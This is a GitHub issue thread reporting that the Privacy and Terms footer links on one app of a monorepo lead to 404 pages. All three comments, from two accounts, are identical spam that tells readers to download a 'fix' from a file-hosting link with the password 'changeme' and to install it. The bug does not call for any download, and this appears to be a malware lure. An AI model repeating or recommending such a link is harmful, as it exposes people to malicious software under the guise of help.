### ISSUE TITLE
FIX: Privacy and Terms links doesn't work

### ISSUE THREAD

**Issue by 7alip** [freedomcombination/monorepo#1608]
### Describe the bug

Some apps don't have privacy and terms pages. Footer links don't work.

### To Reproduce

Go to `https://kunsthalte.com`. Click `Privacy` or `Terms` link in the footer. You will see 404 page.

### Expected behavior

The pages should exist like the other apps. Remember that we have the contents only in English.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
